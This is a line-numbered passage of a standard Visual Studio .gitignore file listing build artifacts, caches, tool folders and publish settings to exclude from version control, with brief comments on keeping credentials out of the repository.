56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------